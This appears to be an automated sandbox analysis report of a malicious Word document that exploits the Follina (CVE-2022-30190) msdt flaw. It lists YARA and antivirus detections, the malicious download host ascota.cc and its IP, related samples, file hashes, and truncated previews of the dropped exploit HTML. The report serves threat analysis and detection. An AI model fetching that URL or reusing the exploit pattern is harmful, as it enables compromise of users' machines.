      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: 3BgX69C870.docx | Metadefender: Detection: 20%
      Source: 3BgX69C870.docx | ReversingLabs: Detection: 65%
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: 3BgX69C870.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\3BgX69C870.docx
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$gX69C870.docx
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR62E7.tmp
      Source: classification engine | Classification label: mal100.expl.evad.winDOCX@1/19@7/1
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.dr | OLE document summary: title field not present or empty
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.dr | OLE document summary: author field not present or empty
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.dr | OLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

      Persistence and Installation Behavior

      Source: document.xml.rels | Extracted files from sample: https://ascota.cc/index.html!
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Techniques per tactic column (a number shown beside a technique in the matrix is kept in parentheses):
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Exploitation for Client Execution (13); Scheduled Task/Job; At (Linux); At (Windows)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Masquerading (1); Rootkit; Obfuscated Files or Information; Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: File and Directory Discovery (1); System Information Discovery (2); Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Ingress Tool Transfer (2)
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
Impact: Modify System Partition; Device Lockout; Delete Device Data

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

Source | Detection | Scanner | Label
3BgX69C870.docx | 20% | Metadefender |
3BgX69C870.docx | 65% | ReversingLabs | Document-Word.Trojan.Leonem
3BgX69C870.docx | 100% | Avira | W97M/Dldr.Agent.G1
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm | 100% | Avira | JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm | 100% | Avira | JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm | 100% | Avira | JS/CVE-2022-30190.G
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label
https://ascota.cc/index.html | 100% | Avira URL Cloud | malware
https://ascota.cc/index.htmlyX | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ascota.cc | 50.31.246.2 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://ascota.cc/index.html | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ascota.cc/index.htmlyX | ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.dr | true | Avira URL Cloud: malware | unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
50.31.246.2 | ascota.cc | United States | 40509 | FLYUS | true
        Joe Sandbox Version:35.0.0 Citrine
        Analysis ID:686208
        Start date and time:2022-08-18 10:44:00 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 10s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:3BgX69C870 (renamed file extension from none to docx)
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:6
        Number of new started drivers analysed:1
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.expl.evad.winDOCX@1/19@7/1
        EGA Information:Failed
        HDC Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • VT rate limit hit for: 3BgX69C870.docx
        No simulations
        No context
        No context
Match | Associated Sample Name / URL | Detection | Context
FLYUS | 3zkECrUffH.dll | malicious | 208.85.60.95
FLYUS | RFQ - 1100195199 - 1100190914.exe | malicious | 50.31.246.1
FLYUS | OQchDohurA.exe | malicious | 77.83.141.16
FLYUS | PO(EME39134).xlsx | malicious | 38.146.68.210
FLYUS | inv.exe | malicious | 77.83.142.181
Match | Associated Sample Name / URL | Detection | Context
05af1f5ca1b87cc9cc9b25185115607d | 0mvOExDB0u.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | efhJIHRd2Y.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | QcwjPo33VV.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | qoIZSkdejM.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | C1ZGt61uGv.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | FzgkVbUkUm.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | YccRHfFd3T.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | fHER4lglqY.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | wWLwoD14Xo.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | ZZkLH4O0Y3.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | icRTA4gcSe.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | dfqqRjnCV5.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | uaMVRwwuyZ.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | SOA USD 85,200.00.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | ORDER 4X30DB.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | Order 90541#.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | NextEra RFQ and Business Proposition.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | BL-20-89DS.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | NOA & Pre-loading docs of CBHU9101956.docx | malicious | 50.31.246.2
05af1f5ca1b87cc9cc9b25185115607d | Product_specification_1.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | 0mvOExDB0u.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | efhJIHRd2Y.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | C6e7u1DTVc.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | QcwjPo33VV.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | qoIZSkdejM.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | C1ZGt61uGv.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | FzgkVbUkUm.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | YccRHfFd3T.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | dl18aYTBo5.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | fHER4lglqY.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | wWLwoD14Xo.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | ZZkLH4O0Y3.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | icRTA4gcSe.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | dfqqRjnCV5.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | uaMVRwwuyZ.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | Product Data Sheet.xlsx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | transcation_swift_dload_16Aug2022_15324.doc | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | SOA USD 85,200.00.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | ORDER 4X30DB.docx | malicious | 50.31.246.2
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Exploit.Siggen3.17149.4489.xls | malicious | 50.31.246.2
        No context
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.287309170602846
        Encrypted:false
        SSDEEP:24:I3vz5C4tB37gITt5YTznw5zIvD8eJRlp3q6RcBahzjo+NdyjuOrmklIW5CeilIgY:I3tRBWiaJ1cKokWI8g0HYUrJNggNg4H
        MD5:E88B0DB57BD8675D626F241A6DE70B77
        SHA1:A905F7B1FE5C94F5EB3D065C6A0C45C310A324D4
        SHA-256:E0F862F742FB0A23119306427F50BC351CC9D4A75641B0A2D0EC223A2DA455C1
        SHA-512:195184D3328417C698B187DCBEA9AFB3AE7EC87011E3D81F61F676D244FE6A43799680F309E1E9E58080BCA1C1BF2B88CDFCA8DF22E3EC0A7B82F3981EB3A572
        Malicious:false
        Reputation:low
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.673737435800811
        Encrypted:false
        SSDEEP:96:KXCy678Rx3elt6r+EoGfv8hK8vf+futyAGM5pBJqBJIXfMDfM:s67xH6+GQM
        MD5:4E51082DA6651E300B6C91259223A9F5
        SHA1:0FD415C74D18EBF8112CFDB8451CCB6152997D72
        SHA-256:34FAB831A61A9FBEAA60DC7688ABEDA8B8CA3A89003B751CE1D12A57765E6BA1
        SHA-512:46B38094A02D0478382190B76657A979812E1EA75F15634A62E26E6266AA3E0420E99742BD785272592D6E214124B5F9A53057AD259E13CBEDB6747473069CBB
        Malicious:false
        Reputation:low
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.92546706296779
        Encrypted:false
        SSDEEP:3:yVlgsRlzGhBl9WkH79S6n+SlIM79lkidhg276:yPblzK9WkUtSh7Eeg22
        MD5:4F6DB96FDF66F7A6788031D2D5CC0232
        SHA1:D0F1CC860AFCAE629276405D2DA64E03F3982DB6
        SHA-256:CEC9440988E986CBA29C346683E7FF21BE973AB95A3D67DE7A77445B60FB9274
        SHA-512:C80F97898F4622EE5FFB8BF654524D2DC4AF8A25284EE0045509D6FA381EE798DBA3062A342C1811F26685876D81F6F53DC83FD69EC6863FA55A736DEFE993F5
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.1.8.3.2.5.4.8.9.-.8.F.7.D.-.4.D.D.B.-.A.0.B.A.-.9.4.3.F.6.6.D.E.8.3.8.D.}...F.S.D..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.28419277005313737
        Encrypted:false
        SSDEEP:48:I3xIqRBEnJ9LCFzEZ1O1zQ4YorOmLyQjNlrNja1l1KzF1xRLF1xR7H:KBLkfW9qazQQrOMjNp5+v+x9xdH
        MD5:64F56300F83EAAE5CB4770F023FD03A0
        SHA1:AE8D9FA45CBFBD8C1C1E3A26AEAD897AAB28CACB
        SHA-256:4D8512C5B86DC08807105EC85E96BBAE98A28727A7DF0D40DCCD72102F1768E7
        SHA-512:9D5F629C1E2F871C424FB1511C8212FAD109276B083D24077FA92BBF2856126D39094A6FCD102A941A07298CD110607C9F2B715C67E940EB6457C08E2F9E826F
        Malicious:false
        Reputation:low
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.2220402862857889
        Encrypted:false
        SSDEEP:48:I3bUrB4RxF1XOWUXC9YLZ0Fv6C6MYD+39Xoh6h9Xoh6L:KbC4RN+WUd+taMXWkXWQ
        MD5:656A91268490890538FDA8214268BD9D
        SHA1:93F9AD21F70617632CF7A28BADBFB5730244CED5
        SHA-256:BB7045980D9DED29076811A7B4A90A8ED256886DC75B646A271A3A8A82BE3B38
        SHA-512:52C0DDE4984DFAF3D7EF2E7D3EBB3D51ABD0B7981482D6FF13AF319A0E49231AB41A7A864CBA32A17B72C8BDA8FC01763256F9D73C8CDD261A03482A1D800163
        Malicious:false
        Reputation:low
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.9626738605132825
        Encrypted:false
        SSDEEP:3:yVlgsRlz8IlR1eyQWRAOGyivlUMlZ+lsg276:yPblzrj16WHGyivlUMuz22
        MD5:997672D88598225C3FA2F51B1E3BD35E
        SHA1:D36469237EE014C361BE1D97F07B13097CB7BD55
        SHA-256:245EDC20169C2604F500F382CCEC9105CA5E93E799F99E56823282A5FB672EEF
        SHA-512:F3E08AF2F8A75E6196C2FC18A14846B5A0580A77FE3D690486497FD40DE9AF24880BDDDA641F47DF828972114DAE43A2FFAFAF6A2421E7F5A79D5DF89F631338
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.1.B.7.B.4.1.A.5.-.9.8.9.5.-.4.7.A.6.-.B.1.9.9.-.1.C.3.C.2.D.7.3.F.3.8.A.}...F.S.D..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text
        Category:downloaded
        Size (bytes):9436
        Entropy (8bit):0.6237714669020853
        Encrypted:false
        SSDEEP:192:VBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffRz:d
        MD5:FBDACF8FB5CCA0ABFED43223D32F89DD
        SHA1:72A038DF096C97FBF7514808D181D6AD356C5443
        SHA-256:30FCFA7F6292D3D62578F625F181BE62A222B0E6EA20A469E27FC1B23B94DBAB
        SHA-512:21FE9482108179333D92A7EF3ED6F8C705B6DEC4A43BA5A36C7E30677215887620C466E189F4D0D74A0CC9CF0AF990ECF5F2D19A4126E5E118DF82F8213942A4
        Malicious:true
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:low
        IE Cache URL:https://ascota.cc/index.html
        Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAA
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):4988
        Entropy (8bit):3.8049842046783233
        Encrypted:false
        SSDEEP:48:E3TN78sdBgLfVTped//HksYHGui3DAjG6kpnydHkgSu:E3Z7xBSTped//qH3i3DAq+EgSu
        MD5:EB1198A6B05E17758FE7464367AD7D5F
        SHA1:933D38674C516990F9E65B2D30C5F88C47D594E0
        SHA-256:DF3CE08C1EEA90005CF71F477D1FE40E2A43C0FC826003A8C2263A275CDBCA5C
        SHA-512:98A2A83FBB9D6F8C04F77BACAD1EA0A70C7EDA90C8260125D77A162E5746DDCE850A89DEBE65222A7EE9F9CF01C4209EE3345A46C18787A67A3E366A4E75DD21
        Malicious:false
        Reputation:low
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text
        Category:dropped
        Size (bytes):9436
        Entropy (8bit):0.6237714669020853
        Encrypted:false
        SSDEEP:192:VBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffRz:d
        MD5:FBDACF8FB5CCA0ABFED43223D32F89DD
        SHA1:72A038DF096C97FBF7514808D181D6AD356C5443
        SHA-256:30FCFA7F6292D3D62578F625F181BE62A222B0E6EA20A469E27FC1B23B94DBAB
        SHA-512:21FE9482108179333D92A7EF3ED6F8C705B6DEC4A43BA5A36C7E30677215887620C466E189F4D0D74A0CC9CF0AF990ECF5F2D19A4126E5E118DF82F8213942A4
        Malicious:true
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, Author: Nasreddine Bencherchali, Christian Burkard
        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:low
        Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAA
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text
        Category:dropped
        Size (bytes):9436
        Entropy (8bit):0.6237714669020853
        Encrypted:false
        SSDEEP:192:VBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffRz:d
        MD5:FBDACF8FB5CCA0ABFED43223D32F89DD
        SHA1:72A038DF096C97FBF7514808D181D6AD356C5443
        SHA-256:30FCFA7F6292D3D62578F625F181BE62A222B0E6EA20A469E27FC1B23B94DBAB
        SHA-512:21FE9482108179333D92A7EF3ED6F8C705B6DEC4A43BA5A36C7E30677215887620C466E189F4D0D74A0CC9CF0AF990ECF5F2D19A4126E5E118DF82F8213942A4
        Malicious:true
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, Author: Nasreddine Bencherchali, Christian Burkard
        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:low
        Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAA
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):5120
        Entropy (8bit):2.0373587739224037
        Encrypted:false
        SSDEEP:24:r/aEK/OD5oeZU2eZUliy5oeZqioaZHkodSeZUliD:r/aRK5okLiy5o8Zl4Li
        MD5:59A7B83F205331057BEA523D3278CF97
        SHA1:699F1642486E7B192C1EA3F43BC6B3C29E65B785
